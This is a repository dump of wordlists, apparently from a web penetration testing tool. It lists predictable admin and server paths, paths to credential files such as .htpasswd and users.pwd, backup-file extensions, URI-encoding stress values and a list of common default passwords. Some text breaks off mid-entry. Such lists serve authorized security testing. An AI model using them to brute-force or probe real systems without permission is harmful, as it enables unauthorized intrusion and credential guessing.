config/locales/en.yml 40 | config/routes.rb 41 | core 42 | create 43 | db 44 | db/seeds.rb 45 | dispatch.cgi 46 | dispatch.fcgi 47 | dispatch.rb 48 | doc 49 | doc/README_FOR_APP 50 | lib 51 | lib/assets 52 | lib/assets/.gitkeep 53 | lib/tasks 54 | lib/tasks/.gitkeep 55 | log 56 | log/.gitkeep 57 | log/development.log 58 | log/production.log 59 | log/server.log 60 | log/test.log 61 | public 62 | public/404.html 63 | public/422.html 64 | public/500.html 65 | public/favicon.ico 66 | public/index.html 67 | public/robots.txt 68 | rails 69 | rails/info 70 | rails/info/properties 71 | script 72 | script/about 73 | script/console 74 | script/dbconsole 75 | script/destroy 76 | script/generate 77 | script/performance 78 | script/performance/benchmarker 79 | script/performance/profiler 80 | script/performance/request 81 | script/plugin 82 | script/process 83 | script/process/inspector 84 | script/process/reaper 85 | script/process/spawner 86 | script/rails 87 | script/runner 88 | script/server 89 | stdlib 90 | test/fixtures 91 | test/fixtures/.gitkeep 92 | test/functional 93 | test/functional/.gitkeep 94 | test/integration 95 | test/integration/.gitkeep 96 | test/performance/browsing_test.rb 97 | test/test_helper.rb 98 | test/unit 99 | test/unit/.gitkeep 100 | tmp/cache 101 | tmp/cache/assets 102 | vendor/assets/javascripts 103 | vendor/assets/javascripts/.gitkeep 104 | vendor/assets/stylesheets 105 | vendor/assets/stylesheets/.gitkeep 106 | vendor/plugins 107 | vendor/plugins/.gitkeep 108 | app/views/home/index.html.erb 109 | assets/application.css 110 | assets/jquery.js 111 | assets/application.js 112 | assets/home.css 113 | assets/home.js 114 | posts 115 | posts/new 116 | posts/1/edit 117 | posts.json 118 | javascripts/application.js 119 | javascripts/prototype.js 120 | stylesheets/application.css 121 | images/rails.png 122 | -------------------------------------------------------------------------------- 
/wordlist/discovery/predictable-filepaths/webservers-appservers/SiteMinder.txt: -------------------------------------------------------------------------------- 1 | /iam/ 2 | /iam/siteminder/ 3 | /sitemindermonitor/ 4 | /sitemindermonitor/doConfig.jsp 5 | /sitemindermonitor/doSave.jsp 6 | /sitemindermonitor/readfile.jsp 7 | /siteminder/ 8 | /siteminder/monitor/ 9 | /siteminder/monitor/settings 10 | /doConfig.jsp 11 | /doSave.jsp 12 | /readfile.jsp 13 | /siteminderagent/ 14 | /siteminderagent/pwcgi/ 15 | /siteminderagent/pwcgi/smpwservicescgi.exe 16 | /auth/ 17 | /servlet/ 18 | /servlet/DateServlet 19 | /servlet/TestServlet 20 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/SunAppServerGlassfish.txt: -------------------------------------------------------------------------------- 1 | /BasicAuthServlet 2 | /CertAuthServlet 3 | /cgi-bin 4 | /cgi-bin/gx.cgi 5 | /cgi-bin/gx.dll 6 | /cgi-bin/gx.exe 7 | /classes 8 | /com.netscape.server.servlet.jsp.JSPRunner 9 | /COnlineBank 10 | /CSample 11 | /ExceptionThrown.jsp 12 | /FormAuthServlet 13 | /fortune 14 | /gx 15 | /GXApp 16 | /GXApp/COnlineBank 17 | /GXApp/COnlineBank/COBLogin.html 18 | /GXApp/CSample 19 | /GXApp/CSample/index.html 20 | /GXApp/images 21 | /GXApp/index.html 22 | /GXApp/OnlineBank 23 | /GXApp/OnlineBank/OBLogin.html 24 | /gx.cgi 25 | /gx.exe 26 | /ias-samples 27 | /ias-samples/index.html 28 | /index.html 29 | /JSPRunner 30 | /JSPRunnerSticky 31 | /lotery 32 | /NASApp 33 | /NASApp/fortune/fortune 34 | /NASApp/system 35 | /NASApp/system/BasicAuthServlet 36 | /NASApp/system/CertAuthServlet 37 | /NASApp/system/ExceptionThrown.jsp 38 | /NASApp/system/FormAuthServlet 39 | /NASApp/system/JSPRunner 40 | /NASApp/system/JSPRunnerSticky 41 | /NASApp/system/SessionInvalidator 42 | /NASApp/system/StaticServlet 43 | /NASApp/system/ValidationError.jsp 44 | /NASApp/system/WelcomeListServlet 45 | /OnlineBank 46 | /servlet 47 | 
/SessionInvalidator 48 | /StaticServlet 49 | /system 50 | /ValidationError.jsp 51 | /WelcomeListServlet 52 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/SuniPlanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | cgi-bin 18 | config 19 | dirb_random.cgi 20 | dirb_random.jsp 21 | dirb_random.shtml 22 | docs 23 | dsgw 24 | help 25 | index.html 26 | jsp 27 | manual 28 | mc-icons 29 | netshare 30 | ns-icons 31 | publisher 32 | search 33 | search-ui 34 | servlet 35 | servlets 36 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/webservers-appservers/Vignette.txt: -------------------------------------------------------------------------------- 1 | /0,,,00 2 | /0,,,00.html 3 | /1,,,00 4 | /1,,,00.html 5 | /CDA 6 | /CDS 7 | /CMA 8 | /CMS 9 | /Deleting 10 | /Docs 11 | /Editing 12 | /HOME 13 | /Images 14 | /Internal 15 | /MetaDataUpdate 16 | /Report 17 | /Select 18 | /StoryServer 19 | /TMT 20 | /VGN 21 | /XML 22 | /ac 23 | /allvars 24 | /asp 25 | /aspstatus 26 | /cda 27 | /cds 28 | /cma 29 | /cms 30 | /controller 31 | /diag 32 | /docs 33 | /edit 34 | /error 35 | /errorpage 36 | /errors 37 | /executequery 38 | /external 39 | /home 40 | /ibm 41 | /initialize 42 | /internal 43 | /jsp 44 | /jspstatus 45 | /jsptest 46 | /legacy 47 | /license 48 | /listcolumns 49 | /login 50 | /loginlogo 51 | /logo 52 | /main 53 | /menu 54 | /metadataupdate 55 | /performance 56 | /portal 57 | /ppstats 58 | /preview 59 | /previewer 60 | /record 61 | /reset 62 | /save 63 | /stat 64 | /status 65 | /storyserver 66 | /style 67 | 
/stylepreviewer 68 | /utils 69 | /vdc 70 | /vgn 71 | /vr 72 | /Ping.jsp 73 | /HelloWorld.jsp 74 | -------------------------------------------------------------------------------- /wordlist/discovery/predictable-filepaths/wellknown-rfc5785.txt: -------------------------------------------------------------------------------- 1 | .well-known/ 2 | .well-known/acme-challenge 3 | .well-known/apple-app-site-association 4 | .well-known/apple-developer-merchant-domain-association 5 | .well-known/ashrae 6 | .well-known/assetlinks.json 7 | .well-known/browserid 8 | .well-known/caldav 9 | .well-known/carddav 10 | .well-known/core 11 | .well-known/csvm 12 | .well-known/dnt 13 | .well-known/dnt-policy.txt 14 | .well-known/est 15 | .well-known/genid 16 | .well-known/hoba 17 | .well-known/host-meta 18 | .well-known/host-meta.json 19 | .well-known/keybase.txt 20 | .well-known/ni 21 | .well-known/openid-configuration 22 | .well-known/openorg 23 | .well-known/posh 24 | .well-known/reload-config 25 | .well-known/repute-template 26 | .well-known/stun-key 27 | .well-known/time 28 | .well-known/timezone 29 | .well-known/void 30 | .well-known/webfinger 31 | -------------------------------------------------------------------------------- /wordlist/general/admin-panels.txt: -------------------------------------------------------------------------------- 1 | admin.php 2 | admin/ 3 | administrator/ 4 | moderator/ 5 | webadmin/ 6 | adminarea/ 7 | bb-admin/ 8 | adminLogin/ 9 | admin_area/ 10 | panel-administracion/ 11 | instadmin/ 12 | memberadmin/ 13 | administratorlogin/ 14 | adm/ 15 | admin/account.php 16 | admin/index.php 17 | admin/login.php 18 | admin/admin.php 19 | admin/account.php 20 | joomla/administrator 21 | login.php 22 | admin_area/admin.php 23 | admin_area/login.php 24 | siteadmin/login.php 25 | siteadmin/index.php 26 | siteadmin/login.html 27 | admin/account.html 28 | admin/index.html 29 | admin/login.html 30 | admin/admin.html 31 | admin_area/index.php 32 | bb-admin/index.php 
33 | bb-admin/login.php 34 | bb-admin/admin.php 35 | admin/home.php 36 | admin_area/login.html 37 | admin_area/index.html 38 | admin/controlpanel.php 39 | admincp/index.asp 40 | admincp/login.asp 41 | admincp/index.html 42 | admin/account.html 43 | adminpanel.html 44 | webadmin.html 45 | webadmin/index.html 46 | webadmin/admin.html 47 | webadmin/login.html 48 | admin/admin_login.html 49 | admin_login.html 50 | panel-administracion/login.html 51 | admin/cp.php 52 | cp.php 53 | administrator/index.php 54 | administrator/login.php 55 | nsw/admin/login.php 56 | webadmin/login.php 57 | admin/admin_login.php 58 | admin_login.php 59 | administrator/account.php 60 | administrator.php 61 | admin_area/admin.html 62 | pages/admin/admin-login.php 63 | admin/admin-login.php 64 | admin-login.php 65 | bb-admin/index.html 66 | bb-admin/login.html 67 | bb-admin/admin.html 68 | admin/home.html 69 | modelsearch/login.php 70 | moderator.php 71 | moderator/login.php 72 | moderator/admin.php 73 | account.php 74 | pages/admin/admin-login.html 75 | admin/admin-login.html 76 | admin-login.html 77 | controlpanel.php 78 | admincontrol.php 79 | admin/adminLogin.html 80 | adminLogin.html 81 | admin/adminLogin.html 82 | home.html 83 | rcjakar/admin/login.php 84 | adminarea/index.html 85 | adminarea/admin.html 86 | webadmin.php 87 | webadmin/index.php 88 | webadmin/admin.php 89 | admin/controlpanel.html 90 | admin.html 91 | admin/cp.html 92 | cp.html 93 | adminpanel.php 94 | moderator.html 95 | administrator/index.html 96 | administrator/login.html 97 | user.html 98 | administrator/account.html 99 | administrator.html 100 | login.html 101 | modelsearch/login.html 102 | moderator/login.html 103 | adminarea/login.html 104 | panel-administracion/index.html 105 | panel-administracion/admin.html 106 | modelsearch/index.html 107 | modelsearch/admin.html 108 | admincontrol/login.html 109 | adm/index.html 110 | adm.html 111 | moderator/admin.html 112 | user.php 113 | account.html 114 | controlpanel.html 
115 | admincontrol.html 116 | panel-administracion/login.php 117 | wp-login.php 118 | adminLogin.php 119 | admin/adminLogin.php 120 | home.php 121 | adminarea/index.php 122 | adminarea/admin.php 123 | adminarea/login.php 124 | panel-administracion/index.php 125 | panel-administracion/admin.php 126 | modelsearch/index.php 127 | modelsearch/admin.php 128 | admincontrol/login.php 129 | adm/admloginuser.php 130 | admloginuser.php 131 | admin2.php 132 | admin2/login.php 133 | admin2/index.php 134 | adm/index.php 135 | adm.php 136 | affiliate.php 137 | adm_auth.php -------------------------------------------------------------------------------- /wordlist/general/big.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/general/big.txt -------------------------------------------------------------------------------- /wordlist/general/catala.txt: -------------------------------------------------------------------------------- 1 | acces 2 | activitats 3 | administracio 4 | afegir 5 | agafar 6 | agenda 7 | ajuda 8 | ajudes 9 | antic 10 | arrel 11 | article 12 | articles 13 | arxiu 14 | arxius 15 | borsa 16 | botiga 17 | bulleti 18 | bustia 19 | calaix 20 | campanyes 21 | capsalera 22 | carpeta 23 | cat 24 | catala 25 | cataleg 26 | catalegs 27 | categories 28 | celler 29 | cerca 30 | cercador 31 | claus 32 | client 33 | clients 34 | colleccio 35 | comunicacio 36 | confirmacio 37 | contingut 38 | continguts 39 | copia 40 | correu 41 | crida 42 | dades 43 | demamar 44 | demanas 45 | descarrega 46 | descarregues 47 | desenvolupament 48 | directori 49 | disseny 50 | document 51 | documentacio 52 | documents 53 | eines 54 | empreses 55 | enllacos 56 | entitats 57 | entorns 58 | esborrar 59 | escola 60 | externes 61 | finestra 62 | fitxer 63 | fitxers 64 | fonts 65 | formulari 66 | formularis 67 | forum 68 | forums 69 | gestio 70 | glossari 71 | 
historic 72 | imatge 73 | imatges 74 | informacio 75 | inici 76 | jocs 77 | lletres 78 | lleure 79 | llibres 80 | llista 81 | localitzador 82 | locals 83 | maquinari 84 | mitjans 85 | mostra 86 | mostres 87 | mot 88 | noticies 89 | nou 90 | novetats 91 | nul 92 | obrir 93 | operacio 94 | organitzacions 95 | pagines 96 | pas 97 | personals 98 | pestanya 99 | pestanyes 100 | peu 101 | porta 102 | primer 103 | principal 104 | privat 105 | programari 106 | projecte 107 | projectes 108 | prova 109 | proves 110 | public 111 | publicacions 112 | pujar 113 | recerca 114 | recull 115 | reculls 116 | registre 117 | registres 118 | salo 119 | seccio 120 | segon 121 | seguretat 122 | serveis 123 | sistemes 124 | sumari 125 | sumaris 126 | tasques 127 | taula 128 | tauler 129 | tecnic 130 | temes 131 | tercer 132 | titulars 133 | tot 134 | totes 135 | tots 136 | transit 137 | transmissio 138 | treballador 139 | treballadors 140 | usuari 141 | usuaris 142 | vell 143 | veure 144 | -------------------------------------------------------------------------------- /wordlist/general/euskera.txt: -------------------------------------------------------------------------------- 1 | administrazio 2 | administrazioa 3 | argitalpenak 4 | artxiboa 5 | ataria 6 | aupa 7 | aurrera 8 | bai 9 | berri 10 | bidali 11 | bilatu 12 | buzoia 13 | dataz 14 | dokumentuak 15 | egutegia 16 | erreala 17 | ez 18 | fitxategia 19 | foru 20 | gestio 21 | gidak 22 | gora 23 | hasi 24 | hizkuntza 25 | ikusi 26 | informazio 27 | loturak 28 | makusi 29 | mezuak 30 | oharra 31 | proiektua 32 | saioa 33 | sustapena 34 | taula 35 | txostena 36 | -------------------------------------------------------------------------------- /wordlist/general/extensions_common.txt: -------------------------------------------------------------------------------- 1 | .asp 2 | .aspx 3 | .bat 4 | .c 5 | .cfm 6 | .cgi 7 | .com 8 | .dll 9 | .exe 10 | .htm 11 | .html 12 | .inc 13 | .jhtml 14 | .jsa 15 | .jsp 16 | .log 17 | .mdb 18 | .nsf 19 
| .php 20 | .phtml 21 | .pl 22 | .reg 23 | .sh 24 | .shtml 25 | .sql 26 | .txt 27 | .xml 28 | / 29 | -------------------------------------------------------------------------------- /wordlist/general/http_methods.txt: -------------------------------------------------------------------------------- 1 | GET 2 | NOEXISTE 3 | POST 4 | HEAD 5 | PUT 6 | TRACE 7 | TRACK 8 | SEARCH 9 | INDEX 10 | OPTIONS 11 | DELETE 12 | CONNECT 13 | PATCH 14 | PROPFIND 15 | PROPPATCH 16 | MKCOL 17 | COPY 18 | MOVE 19 | LOCK 20 | UNLOCK 21 | CHECKOUT 22 | SHOWMETHOD 23 | LINK 24 | UNLINK 25 | CHECKIN 26 | TEXTSEARCH 27 | SPACEJUMP 28 | ORDERPATCH 29 | ACL 30 | VERSION-CONTROL 31 | REPORT 32 | UNCHECKOUT 33 | -------------------------------------------------------------------------------- /wordlist/general/medium.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dzonerzy/goWAPT/3aed792cbca3ec8f7fbf106c39116b197188924b/wordlist/general/medium.txt -------------------------------------------------------------------------------- /wordlist/general/mutations_common.txt: -------------------------------------------------------------------------------- 1 | .001 2 | .002 3 | .1 4 | .2 5 | .7z 6 | .Z 7 | .back 8 | .backup 9 | .bak 10 | .bakup 11 | .bas 12 | .bz2 13 | .c 14 | .conf 15 | .copia 16 | .core 17 | .cpp 18 | .dat 19 | .db 20 | .default 21 | .dll 22 | .doc 23 | .ini 24 | .jar 25 | .java 26 | .old 27 | .orig 28 | .pas 29 | .rar 30 | .sav 31 | .saved 32 | .source 33 | .src 34 | .stackdump 35 | .tar 36 | .tar.gz 37 | .temp 38 | .test 39 | .tgz 40 | .tmp 41 | .txt 42 | .war 43 | .zip 44 | ~ 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /wordlist/general/test.txt: -------------------------------------------------------------------------------- 1 | master 2 | environment 3 | classes 4 | css 5 | images 6 | includes 7 | scripts 8 | images 9 | docs 10 | test 11 | 
prueba 12 | -------------------------------------------------------------------------------- /wordlist/others/common_pass.txt: -------------------------------------------------------------------------------- 1 | 2 | 123456 3 | 1234567 4 | 12345678 5 | 123asdf 6 | Admin 7 | admin 8 | administrator 9 | asdf123 10 | backup 11 | backupexec 12 | changeme 13 | clustadm 14 | cluster 15 | compaq 16 | default 17 | dell 18 | dmz 19 | domino 20 | exchadm 21 | exchange 22 | ftp 23 | gateway 24 | guest 25 | lotus 26 | money 27 | notes 28 | office 29 | oracle 30 | pass 31 | password 32 | password! 33 | password1 34 | print 35 | qwerty 36 | replicate 37 | seagate 38 | secret 39 | sql 40 | sqlexec 41 | temp 42 | temp! 43 | temp123 44 | test 45 | test! 46 | test123 47 | tivoli 48 | veritas 49 | virus 50 | web 51 | www 52 | KKKKKKK -------------------------------------------------------------------------------- /wordlist/regex/amazon.txt: -------------------------------------------------------------------------------- 1 | (? 31 | ? 
32 | @ 33 | A 34 | B 35 | C 36 | D 37 | E 38 | F 39 | G 40 | H 41 | I 42 | J 43 | K 44 | L 45 | M 46 | N 47 | O 48 | P 49 | Q 50 | R 51 | S 52 | T 53 | U 54 | V 55 | W 56 | X 57 | Y 58 | Z 59 | [ 60 | \ 61 | ] 62 | ^ 63 | _ 64 | ` 65 | a 66 | b 67 | c 68 | d 69 | e 70 | f 71 | g 72 | h 73 | i 74 | j 75 | k 76 | l 77 | m 78 | n 79 | o 80 | p 81 | q 82 | r 83 | s 84 | t 85 | u 86 | v 87 | w 88 | x 89 | y 90 | z 91 | { 92 | | 93 | } 94 | ~ 95 | 96 | -------------------------------------------------------------------------------- /wordlist/stress/char.txt: -------------------------------------------------------------------------------- 1 | a 2 | b 3 | c 4 | d 5 | e 6 | f 7 | g 8 | h 9 | i 10 | j 11 | k 12 | l 13 | m 14 | n 15 | o 16 | p 17 | q 18 | r 19 | s 20 | t 21 | u 22 | v 23 | w 24 | x 25 | y 26 | z 27 | -------------------------------------------------------------------------------- /wordlist/stress/doble_uri_hex.txt: -------------------------------------------------------------------------------- 1 | %2500 2 | %2501 3 | %2502 4 | %2503 5 | %2504 6 | %2505 7 | %2506 8 | %2507 9 | %2508 10 | %2509 11 | %250a 12 | %250b 13 | %250c 14 | %250d 15 | %250e 16 | %250f 17 | %2510 18 | %2511 19 | %2512 20 | %2513 21 | %2514 22 | %2515 23 | %2516 24 | %2517 25 | %2518 26 | %2519 27 | %251a 28 | %251b 29 | %251c 30 | %251d 31 | %251e 32 | %251f 33 | %2520 34 | %2521 35 | %2522 36 | %2523 37 | %2524 38 | %2525 39 | %2526 40 | %2527 41 | %2528 42 | %2529 43 | %252a 44 | %252b 45 | %252c 46 | %252d 47 | %252e 48 | %252f 49 | %2530 50 | %2531 51 | %2532 52 | %2533 53 | %2534 54 | %2535 55 | %2536 56 | %2537 57 | %2538 58 | %2539 59 | %253a 60 | %253b 61 | %253c 62 | %253d 63 | %253e 64 | %253f 65 | %2540 66 | %2541 67 | %2542 68 | %2543 69 | %2544 70 | %2545 71 | %2546 72 | %2547 73 | %2548 74 | %2549 75 | %254a 76 | %254b 77 | %254c 78 | %254d 79 | %254e 80 | %254f 81 | %2550 82 | %2551 83 | %2552 84 | %2553 85 | %2554 86 | %2555 87 | %2556 88 | %2557 89 | %2558 90 | %2559 91 
| %255a 92 | %255b 93 | %255c 94 | %255d 95 | %255e 96 | %255f 97 | %2560 98 | %2561 99 | %2562 100 | %2563 101 | %2564 102 | %2565 103 | %2566 104 | %2567 105 | %2568 106 | %2569 107 | %256a 108 | %256b 109 | %256c 110 | %256d 111 | %256e 112 | %256f 113 | %2570 114 | %2571 115 | %2572 116 | %2573 117 | %2574 118 | %2575 119 | %2576 120 | %2577 121 | %2578 122 | %2579 123 | %257a 124 | %257b 125 | %257c 126 | %257d 127 | %257e 128 | %257f 129 | %2580 130 | %2581 131 | %2582 132 | %2583 133 | %2584 134 | %2585 135 | %2586 136 | %2587 137 | %2588 138 | %2589 139 | %258a 140 | %258b 141 | %258c 142 | %258d 143 | %258e 144 | %258f 145 | %2590 146 | %2591 147 | %2592 148 | %2593 149 | %2594 150 | %2595 151 | %2596 152 | %2597 153 | %2598 154 | %2599 155 | %259a 156 | %259b 157 | %259c 158 | %259d 159 | %259e 160 | %259f 161 | %25a0 162 | %25a1 163 | %25a2 164 | %25a3 165 | %25a4 166 | %25a5 167 | %25a6 168 | %25a7 169 | %25a8 170 | %25a9 171 | %25aa 172 | %25ab 173 | %25ac 174 | %25ad 175 | %25ae 176 | %25af 177 | %25b0 178 | %25b1 179 | %25b2 180 | %25b3 181 | %25b4 182 | %25b5 183 | %25b6 184 | %25b7 185 | %25b8 186 | %25b9 187 | %25ba 188 | %25bb 189 | %25bc 190 | %25bd 191 | %25be 192 | %25bf 193 | %25c0 194 | %25c1 195 | %25c2 196 | %25c3 197 | %25c4 198 | %25c5 199 | %25c6 200 | %25c7 201 | %25c8 202 | %25c9 203 | %25ca 204 | %25cb 205 | %25cc 206 | %25cd 207 | %25ce 208 | %25cf 209 | %25d0 210 | %25d1 211 | %25d2 212 | %25d3 213 | %25d4 214 | %25d5 215 | %25d6 216 | %25d7 217 | %25d8 218 | %25d9 219 | %25da 220 | %25db 221 | %25dc 222 | %25dd 223 | %25de 224 | %25df 225 | %25e0 226 | %25e1 227 | %25e2 228 | %25e3 229 | %25e4 230 | %25e5 231 | %25e6 232 | %25e7 233 | %25e8 234 | %25e9 235 | %25ea 236 | %25eb 237 | %25ec 238 | %25ed 239 | %25ee 240 | %25ef 241 | %25f0 242 | %25f1 243 | %25f2 244 | %25f3 245 | %25f4 246 | %25f5 247 | %25f6 248 | %25f7 249 | %25f8 250 | %25f9 251 | %25fa 252 | %25fb 253 | %25fc 254 | %25fd 255 | %25fe 256 | %25ff 257 | 
-------------------------------------------------------------------------------- /wordlist/stress/uri_hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | 
%bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /wordlist/vulns/apache.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | .htpasswd 3 | .meta 4 | .web 5 | access_log 6 | cgi 7 | cgi-bin 8 | cgi-pub 9 | cgi-script 10 | dummy 11 | error 12 | error_log 13 | htdocs 14 | httpd 15 | httpd.pid 16 | icons 17 | index.html 18 | logs 19 | manual 20 | phf 21 | printenv 22 | server-info 23 | server-status 24 | status 25 | test-cgi 26 | tmp 27 | ~bin 28 | ~ftp 29 | ~nobody 30 | ~root 31 | -------------------------------------------------------------------------------- /wordlist/vulns/coldfusion.txt: -------------------------------------------------------------------------------- 1 | CFIDE 2 | CFIDE/administrator 3 | CFIDE/administrator/aboutcf.cfm 4 | CFIDE/administrator/Application.cfm 5 | CFIDE/administrator/checkfile.cfm 6 | CFIDE/administrator/enter.cfm 7 | CFIDE/administrator/header.cfm 8 | CFIDE/administrator/homefile.cfm 9 | CFIDE/administrator/homepage.cfm 10 | CFIDE/administrator/index.cfm 11 | CFIDE/administrator/left.cfm 12 | CFIDE/administrator/linkdirect.cfm 13 | CFIDE/administrator/login.cfm 14 | CFIDE/administrator/logout.cfm 15 | CFIDE/administrator/navserver.cfm 16 | CFIDE/administrator/right.cfm 17 | CFIDE/administrator/tabs.cfm 18 | 
CFIDE/administrator/welcome.cfm 19 | CFIDE/administrator/welcomedoc.cfm 20 | CFIDE/administrator/welcomeexapps.cfm 21 | CFIDE/administrator/welcomefooter.cfm 22 | CFIDE/administrator/welcomegetstart.cfm -------------------------------------------------------------------------------- /wordlist/vulns/fatwire.txt: -------------------------------------------------------------------------------- 1 | servlet/HelloCS 2 | servlet/ContentServer 3 | servlet/Satellite 4 | servlet/CatalogManager 5 | servlet/BlobServer 6 | servlet/TreeManager 7 | servlet/CookieServer 8 | servlet/CacheServer 9 | servlet/EvalServer 10 | servlet/DebugServer 11 | servlet/FlushServer 12 | servlet/SeedDispatchServer 13 | servlet/Inventory 14 | servlet/SyncSeedDispatchServer 15 | servlet/PageDispatchServer 16 | servlet/DispatchManager 17 | servlet 18 | HelloCS 19 | ContentServer 20 | Satellite 21 | CatalogManager 22 | BlobServer 23 | TreeManager 24 | CookieServer 25 | CacheServer 26 | EvalServer 27 | DebugServer 28 | FlushServer 29 | SeedDispatchServer 30 | Inventory 31 | SyncSeedDispatchServer 32 | PageDispatchServer 33 | DispatchManager 34 | Xcelerate/Admin/LoginPage.html 35 | Xcelerate 36 | Admin 37 | LoginPage 38 | LoginPage.html 39 | Xcelerate/LoginPage.html 40 | futuretense_cs/adminforms.html 41 | futuretense_cs 42 | adminforms 43 | adminforms.html 44 | futuretense 45 | openmarket 46 | fatwire 47 | divine 48 | contentserver 49 | xcelerate 50 | assetmaker 51 | -------------------------------------------------------------------------------- /wordlist/vulns/frontpage.txt: -------------------------------------------------------------------------------- 1 | .htaccess 2 | QUERYHIT.HTM 3 | Search 4 | _fpclass 5 | _private 6 | _vti_adm 7 | _vti_aut 8 | _vti_bin 9 | _vti_cnf 10 | _vti_inf.html 11 | _vti_log 12 | _vti_pvt 13 | _vti_script 14 | _vti_txt 15 | admin.dll 16 | admin.exe 17 | administrators.pwd 18 | author.dll 19 | author.exe 20 | author.log 21 | authors.pwd 22 | cgi-bin 23 | default.htm 24 | 
frontpg.ini 25 | iisadmin 26 | isadmin 27 | logo.gif 28 | owssvr.dll 29 | queryhit.htm 30 | samples 31 | search 32 | service.grp 33 | service.pwd 34 | shtml.exe 35 | srchadm 36 | users.pwd 37 | vti_inf.html 38 | -------------------------------------------------------------------------------- /wordlist/vulns/iis.txt: -------------------------------------------------------------------------------- 1 | Micros~1 2 | WebSer~1 3 | _mem_bin 4 | _private 5 | _vti_adm 6 | _vti_aut 7 | _vti_bin 8 | _vti_cnf 9 | _vti_log 10 | _vti_pvt 11 | _vti_script 12 | _vti_txt 13 | administration 14 | adsamples 15 | archiv~1 16 | asp 17 | aspnet_client 18 | asps 19 | bin 20 | bins 21 | cgi-bin 22 | cmsample 23 | common 24 | common~1 25 | db 26 | fpsample 27 | help 28 | iisadmin 29 | iisadmpwd 30 | iishelp 31 | iissamples 32 | images 33 | inetpub 34 | inetsrv 35 | isapi 36 | msadc 37 | pbserver 38 | printers 39 | progra~1 40 | samples 41 | scripts 42 | scripts 43 | scripts/samples 44 | scripts/tools 45 | sites 46 | siteserver 47 | system 48 | system_web 49 | web 50 | webpub 51 | winnt 52 | wwwroot 53 | x.cfm 54 | x.htx 55 | x.ida 56 | x.idc 57 | x.idq 58 | x.pl 59 | x.shtml 60 | -------------------------------------------------------------------------------- /wordlist/vulns/iplanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 